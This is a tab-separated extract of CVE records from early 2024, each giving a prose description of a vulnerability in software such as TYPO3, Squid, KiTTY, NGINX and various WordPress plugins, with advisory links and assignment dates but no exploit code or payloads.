CVE    2024    25119    Candidate    TYPO3 is an open source PHP based web content management system released under the GNU GPL. The plaintext value of `$GLOBALS['SYS']['encryptionKey']` was displayed in the editing forms of the TYPO3 Install Tool user interface. This allowed attackers to utilize the value to generate cryptographic hashes used for verifying the authenticity of HTTP request parameters. Exploiting this vulnerability requires an administrator-level backend user account with system maintainer permissions. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this vulnerability.    MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-h47m-3f78-qp9g   |   URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-h47m-3f78-qp9g   |   MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-004   |   URL:https://typo3.org/security/advisory/typo3-core-sa-2024-004    Assigned (20240205)
CVE    2024    25118    Candidate    TYPO3 is an open source PHP based web content management system released under the GNU GPL. Password hashes were being reflected in the editing forms of the TYPO3 backend user interface. This allowed attackers to crack the plaintext password using brute force techniques. Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this issue.    MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-38r2-5695-334w   |   URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-38r2-5695-334w   |   MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-003   |   URL:https://typo3.org/security/advisory/typo3-core-sa-2024-003    Assigned (20240205)
CVE    2024    25117    Candidate    php-svg-lib is a scalable vector graphics (SVG) file parsing/rendering library. Prior to version 0.5.2, php-svg-lib fails to validate that font-family doesn't contain a PHAR URL, which might lead to RCE on PHP < 8.0, and doesn't validate if external references are allowed. This might lead to bypass of restrictions or RCE on projects that are using it, if they do not strictly revalidate the fontName that is passed by php-svg-lib. The `Style::fromAttributes()` or the `Style::parseCssStyle()` method should check the content of the `font-family` and prevent it from using a PHAR URL, to avoid passing an invalid and dangerous `fontName` value to other libraries. The same check as done in the `Style::fromStyleSheets` might be reused. Libraries using this library as a dependency might be vulnerable to some bypass of restrictions, or even remote code execution, if they do not double check the value of the `fontName` that is passed by php-svg-lib. Version 0.5.2 contains a fix for this issue.    MISC:https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa   |   URL:https://github.com/dompdf/php-svg-lib/commit/732faa9fb4309221e2bd9b2fda5de44f947133aa   |   MISC:https://github.com/dompdf/php-svg-lib/commit/8ffcc41bbde39f09f94b9760768086f12bbdce42   |   URL:https://github.com/dompdf/php-svg-lib/commit/8ffcc41bbde39f09f94b9760768086f12bbdce42   |   MISC:https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273   |   URL:https://github.com/dompdf/php-svg-lib/security/advisories/GHSA-f3qr-qr4x-j273    Assigned (20240205)
CVE    2024    25114    Candidate    Collabora Online is a collaborative online office suite based on LibreOffice technology. Each document in Collabora Online is opened by a separate "Kit" instance in a different "jail" with a unique directory "jailID" name. For security reasons, this directory name is randomly generated and should not be given out to the client. In affected versions of Collabora Online it is possible to use the CELL() function, with the "filename" argument, in the spreadsheet component to get a path which includes this JailID. The impact of this vulnerability on its own is low because it must be chained with another vulnerability. Users should upgrade to Collabora Online 23.05.9; Collabora Online 22.05.22; Collabora Online 21.11.10 or higher. There are no known workarounds for this vulnerability.    MISC:https://github.com/CollaboraOnline/online/security/advisories/GHSA-2fh2-ppjf-p3xv   |   URL:https://github.com/CollaboraOnline/online/security/advisories/GHSA-2fh2-ppjf-p3xv   |   MISC:https://github.com/LibreOffice/online/blob/master/wsd/README   |   URL:https://github.com/LibreOffice/online/blob/master/wsd/README    Assigned (20240205)
CVE    2024    25113    Candidate    ** REJECT ** This CVE was misassigned. See CVE-2023-47623 for the canonical reference.        Assigned (20240205)
CVE    2024    25112    Candidate    Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A denial-of-service was found in Exiv2 version v0.28.1: an unbounded recursion can cause Exiv2 to crash by exhausting the stack. The vulnerable function, `QuickTimeVideo::multipleEntriesDecoder`, was new in v0.28.0, so Exiv2 versions before v0.28 are _not_ affected. The denial-of-service is triggered when Exiv2 is used to read the metadata of a crafted video file. This bug is fixed in version v0.28.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Exiv2/exiv2/pull/2337   |   URL:https://github.com/Exiv2/exiv2/pull/2337   |   MISC:https://github.com/Exiv2/exiv2/security/advisories/GHSA-crmj-qh74-2r36   |   URL:https://github.com/Exiv2/exiv2/security/advisories/GHSA-crmj-qh74-2r36    Assigned (20240205)
CVE    2024    25111    Candidate    Squid is a web proxy cache. Starting in version 3.5.27 and prior to version 6.8, Squid may be vulnerable to a Denial of Service attack against HTTP Chunked decoder due to an uncontrolled recursion bug. This problem allows a remote attacker to cause Denial of Service when sending a crafted, chunked, encoded HTTP Message. This bug is fixed in Squid version 6.8. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. There is no workaround for this issue.    MISC:http://www.squid-cache.org/Versions/v6/SQUID-2024_1.patch   |   URL:http://www.squid-cache.org/Versions/v6/SQUID-2024_1.patch   |   MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc   |   URL:https://github.com/squid-cache/squid/security/advisories/GHSA-72c2-c3wm-8qxc    Assigned (20240205)
CVE    2024    25110    Candidate    The UAMQP is a general purpose C library for AMQP 1.0. During a call to open_get_offered_capabilities, a memory allocation may fail causing a use-after-free issue and if a client called it during connection communication it may cause a remote code execution. Users are advised to update the submodule with commit `30865c9c`. There are no known workarounds for this vulnerability.    MISC:https://github.com/Azure/azure-uamqp-c/commit/30865c9ccedaa32ddb036e87a8ebb52c3f18f695   |   URL:https://github.com/Azure/azure-uamqp-c/commit/30865c9ccedaa32ddb036e87a8ebb52c3f18f695   |   MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-c646-4whf-r67v   |   URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-c646-4whf-r67v    Assigned (20240205)
CVE    2024    25109    Candidate    ManageWiki is a MediaWiki extension allowing users to manage wikis. Special:ManageWiki does not escape interface messages on the `columns` and `help` keys on the form descriptor. An attacker may exploit this and would have a cross site scripting attack vector. Exploiting this on-wiki requires the `(editinterface)` right. Users should apply the code changes in commits `886cc6b94`, `2ef0f50880`, and `6942e8b2c` to resolve this vulnerability. There are no known workarounds for this vulnerability.    MISC:https://github.com/miraheze/ManageWiki/commit/2ef0f50880d7695ca2874dc8dd515b2b9bbb02e5   |   URL:https://github.com/miraheze/ManageWiki/commit/2ef0f50880d7695ca2874dc8dd515b2b9bbb02e5   |   MISC:https://github.com/miraheze/ManageWiki/commit/6942e8b2c01dc33c2c41a471f91ef3f6ca726073   |   URL:https://github.com/miraheze/ManageWiki/commit/6942e8b2c01dc33c2c41a471f91ef3f6ca726073   |   MISC:https://github.com/miraheze/ManageWiki/commit/886cc6b94587f1c7387caa26ca9fe612e01836a0   |   URL:https://github.com/miraheze/ManageWiki/commit/886cc6b94587f1c7387caa26ca9fe612e01836a0   |   MISC:https://github.com/miraheze/ManageWiki/security/advisories/GHSA-4jr2-jhfm-2r84   |   URL:https://github.com/miraheze/ManageWiki/security/advisories/GHSA-4jr2-jhfm-2r84   |   MISC:https://issue-tracker.miraheze.org/T11812   |   URL:https://issue-tracker.miraheze.org/T11812    Assigned (20240205)
CVE    2024    25108    Candidate    Pixelfed is an open source photo sharing platform. When processing requests, authorization was improperly and insufficiently checked, allowing attackers to access far more functionality than users intended, including the administrative and moderator functionality of the Pixelfed server. This vulnerability affects every version of Pixelfed between v0.10.4 and v0.11.9, inclusive. A proof of concept of this vulnerability exists. This vulnerability affects every local user of a Pixelfed server, and can potentially affect the servers' ability to federate. Some user interaction is required to set up the conditions to be able to exercise the vulnerability, but the attacker could conduct this attack in a time-delayed manner, where user interaction is not actively required. This vulnerability has been addressed in version 0.11.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/pixelfed/pixelfed/commit/7e47d6dccb0393a2e95c42813c562c854882b037   |   URL:https://github.com/pixelfed/pixelfed/commit/7e47d6dccb0393a2e95c42813c562c854882b037   |   MISC:https://github.com/pixelfed/pixelfed/security/advisories/GHSA-gccq-h3xj-jgvf   |   URL:https://github.com/pixelfed/pixelfed/security/advisories/GHSA-gccq-h3xj-jgvf    Assigned (20240205)
CVE    2024    25107    Candidate    WikiDiscover is an extension designed for use with a CreateWiki managed farm to display wikis. On Special:WikiDiscover, the `Language::date` function is used when making the human-readable timestamp for inclusion on the wiki_creation column. This function uses interface messages to translate the names of months and days. It uses the `->text()` output mode, returning unescaped interface messages. Since the output is not escaped later, the unescaped interface message is included on the output, resulting in an XSS vulnerability. Exploiting this on-wiki requires the `(editinterface)` right. This vulnerability has been addressed in commit `267e763a0`. Users are advised to update their installations. There are no known workarounds for this vulnerability.    MISC:https://github.com/miraheze/WikiDiscover/commit/267e763a0d7460f001693c42f67717a0fc3fd6bb   |   URL:https://github.com/miraheze/WikiDiscover/commit/267e763a0d7460f001693c42f67717a0fc3fd6bb   |   MISC:https://github.com/miraheze/WikiDiscover/security/advisories/GHSA-cfcf-94jv-455f   |   URL:https://github.com/miraheze/WikiDiscover/security/advisories/GHSA-cfcf-94jv-455f   |   MISC:https://issue-tracker.miraheze.org/T11814   |   URL:https://issue-tracker.miraheze.org/T11814    Assigned (20240205)
CVE    2024    25106    Candidate    OpenObserve is an observability platform built specifically for logs, metrics, traces, analytics, designed to work at petabyte scale. A critical vulnerability has been identified in the "/api/{org_id}/users/{email_id}" endpoint. This vulnerability allows any authenticated user within an organization to remove any other user from that same organization, irrespective of their respective roles. This includes the ability to remove users with "Admin" and "Root" roles. By enabling any organizational member to unilaterally alter the user base, it opens the door to unauthorized access and can cause considerable disruptions in operations. The core of the vulnerability lies in the `remove_user_from_org` function in the user management system. This function is designed to allow organizational users to remove members from their organization. The function does not check if the user initiating the request has the appropriate administrative privileges to remove a user. Any user who is part of the organization, irrespective of their role, can remove any other user, including those with higher privileges. This vulnerability is categorized as an Authorization issue leading to Unauthorized User Removal. The impact is severe, as it compromises the integrity of user management within organizations. By exploiting this vulnerability, any user within an organization, without the need for administrative privileges, can remove critical users, including "Admins" and "Root" users. This could result in unauthorized system access, administrative lockout, or operational disruptions. Given that user accounts are typically created by "Admins" or "Root" users, this vulnerability can be exploited by any user who has been granted access to an organization, thereby posing a critical risk to the security and operational stability of the application. This issue has been addressed in release version 0.8.0. Users are advised to upgrade.    MISC:https://github.com/openobserve/openobserve/security/advisories/GHSA-3m5f-9m66-xgp7   |   URL:https://github.com/openobserve/openobserve/security/advisories/GHSA-3m5f-9m66-xgp7    Assigned (20240205)
CVE    2024    25103    Candidate    This vulnerability exists in AppSamvid software due to the usage of vulnerable and outdated components. An attacker with local administrative privileges could exploit this by placing malicious DLLs on the targeted system. Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code on the targeted system.    MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081   |   URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081    Assigned (20240205)
CVE    2024    25102    Candidate    This vulnerability exists in AppSamvid software due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. An attacker with local administrative privileges could exploit this to obtain the password of AppSamvid on the targeted system. Successful exploitation of this vulnerability could allow the attacker to take complete control of the application on the targeted system.    MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081   |   URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081    Assigned (20240205)
CVE    2024    25101    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Maspik – Spam Blacklist allows Stored XSS. This issue affects Maspik – Spam Blacklist: from n/a through 0.10.6.    MISC:https://patchstack.com/database/vulnerability/contact-forms-anti-spam/wordpress-maspik-spam-blacklist-plugin-0-10-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/contact-forms-anti-spam/wordpress-maspik-spam-blacklist-plugin-0-10-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25100    Candidate    Deserialization of Untrusted Data vulnerability in WP Swings Coupon Referral Program. This issue affects Coupon Referral Program: from n/a through 1.7.2.    MISC:https://patchstack.com/database/vulnerability/coupon-referral-program/wordpress-coupon-referral-program-plugin-1-7-2-unauthenticated-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/coupon-referral-program/wordpress-coupon-referral-program-plugin-1-7-2-unauthenticated-php-object-injection-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25099    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David de Boer Paytium: Mollie payment forms & donations allows Stored XSS. This issue affects Paytium: Mollie payment forms & donations: from n/a through 4.4.2.    MISC:https://patchstack.com/database/vulnerability/paytium/wordpress-paytium-mollie-payment-forms-donations-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/paytium/wordpress-paytium-mollie-payment-forms-donations-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25098    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pascal Bajorat PB oEmbed HTML5 Audio – with Cache Support allows Stored XSS. This issue affects PB oEmbed HTML5 Audio – with Cache Support: from n/a through 2.6.    MISC:https://patchstack.com/database/vulnerability/pb-oembed-html5-audio-with-cache-support/wordpress-pb-oembed-html5-audio-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pb-oembed-html5-audio-with-cache-support/wordpress-pb-oembed-html5-audio-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25097    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode LLC TNC PDF viewer allows Stored XSS. This issue affects TNC PDF viewer: from n/a through 2.8.0.    MISC:https://patchstack.com/database/vulnerability/pdf-viewer-by-themencode/wordpress-tnc-pdf-viewer-plugin-2-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pdf-viewer-by-themencode/wordpress-tnc-pdf-viewer-plugin-2-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25094    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Jura & Nicolas Montigny PJ News Ticker allows Stored XSS. This issue affects PJ News Ticker: from n/a through 1.9.5.    MISC:https://patchstack.com/database/vulnerability/pj-news-ticker/wordpress-pj-news-ticker-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pj-news-ticker/wordpress-pj-news-ticker-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25093    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Milan Petrovic GD Rating System allows Stored XSS. This issue affects GD Rating System: from n/a through 3.5.    MISC:https://patchstack.com/database/vulnerability/gd-rating-system/wordpress-gd-rating-system-plugin-3-5-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/gd-rating-system/wordpress-gd-rating-system-plugin-3-5-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240205)
CVE    2024    25091    Candidate    Protection mechanism failure issue exists in RevoWorks SCVX prior to scvimage4.10.21_1013 (when using 'VirusChecker' or 'ThreatChecker' feature) and RevoWorks Browser prior to 2.2.95 (when using 'VirusChecker' or 'ThreatChecker' feature). If data containing malware is saved in a specific file format (eml, dmg, vhd, iso, msi), malware may be taken outside the sandboxed environment.    MISC:https://jscom.jp/news-20240229/   |   URL:https://jscom.jp/news-20240229/   |   MISC:https://jvn.jp/en/jp/JVN35928117/   |   URL:https://jvn.jp/en/jp/JVN35928117/    Assigned (20240205)
CVE    2024    25089    Candidate    Malwarebytes Binisoft Windows Firewall Control before 6.9.9.2 allows remote attackers to execute arbitrary code via gRPC named pipes.    MISC:https://hackerone.com/reports/2300061   |   MISC:https://www.binisoft.org/changelog.txt    Assigned (20240204)
CVE    2024    25083    Candidate    An issue was discovered in BeyondTrust Privilege Management for Windows before 24.1. When a low-privileged user initiates a repair, there is an attack vector through which the user is able to execute any program with elevated privileges.    CONFIRM:https://www.beyondtrust.com/trust-center/security-advisories/bt24-01    Assigned (20240204)
CVE    2024    25082    Candidate    Splinefont in FontForge through 20230101 allows command injection via crafted archives or compressed files.    FEDORA:FEDORA-2024-e01ef71e64   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCH22HIO2C6M4BZWF5EYIWVFBXL5BQAH/   |   MISC:https://fontforge.org/en-US/downloads/   |   MISC:https://github.com/fontforge/fontforge/pull/5367   |   MLIST:[debian-lts-announce] 20240307 [SECURITY] [DLA 3754-1] fontforge security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html    Assigned (20240204)
CVE    2024    25081    Candidate    Splinefont in FontForge through 20230101 allows command injection via crafted filenames.    FEDORA:FEDORA-2024-e01ef71e64   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCH22HIO2C6M4BZWF5EYIWVFBXL5BQAH/   |   MISC:https://fontforge.org/en-US/downloads/   |   MISC:https://github.com/fontforge/fontforge/pull/5367   |   MLIST:[debian-lts-announce] 20240307 [SECURITY] [DLA 3754-1] fontforge security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html    Assigned (20240204)
CVE    2024    25065    Candidate    Possible path traversal in Apache OFBiz allowing authentication bypass. Users are recommended to upgrade to version 18.12.12, that fixes the issue.    MISC:https://issues.apache.org/jira/browse/OFBIZ-12887   |   URL:https://issues.apache.org/jira/browse/OFBIZ-12887   |   MISC:https://lists.apache.org/thread/rplfjp7ppn9ro49oo7jsrpj99m113lfc   |   URL:https://lists.apache.org/thread/rplfjp7ppn9ro49oo7jsrpj99m113lfc   |   MISC:https://ofbiz.apache.org/download.html   |   URL:https://ofbiz.apache.org/download.html   |   MISC:https://ofbiz.apache.org/release-notes-18.12.12.html   |   URL:https://ofbiz.apache.org/release-notes-18.12.12.html   |   MISC:https://ofbiz.apache.org/security.html   |   URL:https://ofbiz.apache.org/security.html   |   MLIST:[oss-security] 20240228 CVE-2024-25065: Apache OFBiz: Path traversal allowing authentication bypass.   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/10    Assigned (20240204)
CVE    2024    25064    Candidate    Due to insufficient server-side validation, an attacker with login privileges could access certain resources that the attacker should not have access to by changing parameter values.    MISC:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/   |   URL:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/    Assigned (20240204)
CVE    2024    25063    Candidate    Due to insufficient server-side validation, a successful exploit of this vulnerability could allow an attacker to gain access to certain URLs that the attacker should not have access to.    MISC:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/   |   URL:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/    Assigned (20240204)
CVE    2024    25062    Candidate    An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.    CONFIRM:https://gitlab.gnome.org/GNOME/libxml2/-/issues/604   |   MISC:https://gitlab.gnome.org/GNOME/libxml2/-/tags    Assigned (20240204)
CVE    2024    25021    Candidate    IBM AIX 7.3, VIOS 4.1's Perl implementation could allow a non-privileged local user to exploit a vulnerability to execute arbitrary commands. IBM X-Force ID: 281320.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281320   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281320   |   MISC:https://www.ibm.com/support/pages/node/7122628   |   URL:https://www.ibm.com/support/pages/node/7122628    Assigned (20240203)
CVE    2024    25016    Candidate    IBM MQ and IBM MQ Appliance 9.0, 9.1, 9.2, 9.3 LTS and 9.3 CD could allow a remote unauthenticated attacker to cause a denial of service due to incorrect buffering logic. IBM X-Force ID: 281279.    MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281279   |   URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281279   |   MISC:https://www.ibm.com/support/pages/node/7123139   |   URL:https://www.ibm.com/support/pages/node/7123139    Assigned (20240203)
CVE    2024    25006    Candidate    XenForo before 2.2.14 allows Directory Traversal (with write access) by an authenticated user who has permissions to administer styles, and uses a ZIP archive for Styles Import.    CONFIRM:https://xenforo.com/tickets/BC37EB98/?v=5da7bd5728   |   MISC:https://xenforo.com/community/threads/xenforo-2-2-14-released.219044/   |   MISC:https://xenforo.com/docs/xf2/permissions/    Assigned (20240202)
CVE    2024    25004    Candidate    KiTTY versions 0.76.1.13 and before are vulnerable to a stack-based buffer overflow via the username, which occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.    FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables   |   URL:http://seclists.org/fulldisclosure/2024/Feb/14   |   FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)   |   URL:http://seclists.org/fulldisclosure/2024/Feb/13   |   MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html   |   MISC:http://packetstormsecurity.com/files/177032/KiTTY-0.76.1.13-Buffer-Overflows.html   |   MISC:https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004    Assigned (20240202)
CVE    2024    25003    Candidate    KiTTY versions 0.76.1.13 and before are vulnerable to a stack-based buffer overflow via the hostname, which occurs due to insufficient bounds checking and input sanitization. This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.    FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables   |   URL:http://seclists.org/fulldisclosure/2024/Feb/14   |   FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)   |   URL:http://seclists.org/fulldisclosure/2024/Feb/13   |   MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html   |   MISC:http://packetstormsecurity.com/files/177032/KiTTY-0.76.1.13-Buffer-Overflows.html   |   MISC:https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004    Assigned (20240202)
CVE    2024    25002    Candidate    Command Injection in the diagnostics interface of the Bosch Network Synchronizer allows unauthorized users full access to the device.    MISC:https://psirt.bosch.com/security-advisories/BOSCH-SA-152190.html   |   URL:https://psirt.bosch.com/security-advisories/BOSCH-SA-152190.html    Assigned (20240202)
CVE    2024    25001    Candidate    ** REJECT ** DO NOT USE THIS CVE ID. ConsultIDs: none. Reason: This CVE ID is unused by its CNA. Notes: none.        Assigned (20240202)
CVE    2024    2500    Candidate    The ColorMag theme for WordPress is vulnerable to Stored Cross-Site Scripting via a user's Display Name in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://themes.trac.wordpress.org/browser/colormag/3.1.6/inc/template-tags.php#L845   |   URL:https://themes.trac.wordpress.org/browser/colormag/3.1.6/inc/template-tags.php#L845   |   MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=221537%40colormag&new=221537%40colormag&sfp_email=&sfph_mail=   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=221537%40colormag&new=221537%40colormag&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b44d89-6f1e-4a23-91ea-e79fc3221183?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b44d89-6f1e-4a23-91ea-e79fc3221183?source=cve    Assigned (20240315)
CVE    2024    24990    Candidate    When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000138445   |   URL:https://my.f5.com/manage/s/article/K000138445    Assigned (20240202)
CVE    2024    24989    Candidate    When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000138444   |   URL:https://my.f5.com/manage/s/article/K000138444    Assigned (20240202)
CVE    2024    24988    Candidate    Mattermost fails to properly validate the length of the emoji value in the custom user status, allowing an attacker to send multiple times a very long string as an emoji value causing high resource consumption and possibly crashing the server.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240226)
CVE    2024    24975    Candidate    Uncontrolled Resource Consumption in Mattermost Mobile versions before 2.13.0 fails to limit the size of the code block that will be processed by the syntax highlighter, allowing an attacker to send a very large code block and crash the mobile app.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240314)
CVE    2024    2497    Candidate    A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical. This issue affects some unknown processing of the file includes/provider.php of the component HTTP POST Request Handler. The manipulation of the argument country leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256919 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256919   |   MISC:VDB-256919 | RaspAP raspap-webgui HTTP POST Request provider.php code injection   |   URL:https://vuldb.com/?id.256919   |   MISC:https://toradah.notion.site/Code-Injection-Leading-to-Remote-Code-Execution-RCE-in-RaspAP-Web-GUI-d321e1a416694520bec7099253c65060?pvs=4   |   URL:https://toradah.notion.site/Code-Injection-Leading-to-Remote-Code-Execution-RCE-in-RaspAP-Web-GUI-d321e1a416694520bec7099253c65060?pvs=4    Assigned (20240315)
CVE    2024    24966    Candidate    When LDAP remote authentication is configured on F5OS, a remote user without an assigned role will be incorrectly authorized. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K000133111   |   URL:https://my.f5.com/manage/s/article/K000133111    Assigned (20240201)
CVE    2024    24964    Candidate    Improper access control vulnerability exists in the resident process of SKYSEA Client View versions from Ver.11.220 prior to Ver.19.2. If this vulnerability is exploited, an arbitrary process may be executed with SYSTEM privilege by a user who can log in to the PC where the product's Windows client is installed.    MISC:https://jvn.jp/en/jp/JVN54451757/   |   URL:https://jvn.jp/en/jp/JVN54451757/   |   MISC:https://www.skyseaclientview.net/news/240307_01/   |   URL:https://www.skyseaclientview.net/news/240307_01/    Assigned (20240227)
CVE    2024    2496    Candidate    A NULL pointer dereference flaw was found in the udevConnectListAllInterfaces() function in libvirt. This issue can occur when detaching a host interface while at the same time collecting the list of interfaces via virConnectListAllInterfaces API. This flaw could be used to perform a denial of service attack by causing the libvirt daemon to crash.    MISC:RHBZ#2269672   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269672   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2496   |   URL:https://access.redhat.com/security/cve/CVE-2024-2496    Assigned (20240315)
CVE    2024    2495    Candidate    Cryptographic key vulnerability encoded in the FriendlyWrt firmware affecting version 2022-11-16.51b3d35. This vulnerability could allow an attacker to compromise the confidentiality and integrity of encrypted data.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cryptographic-key-plain-text-vulnerability-friendlyelecs-friendlywrt   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cryptographic-key-plain-text-vulnerability-friendlyelecs-friendlywrt    Assigned (20240315)
CVE    2024    24945    Candidate    A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Share Your Moments parameter at /travel-journal/write-journal.php.    MISC:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md   |   URL:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md   |   MISC:https://portswigger.net/web-security/cross-site-scripting   |   URL:https://portswigger.net/web-security/cross-site-scripting    Assigned (20240201)
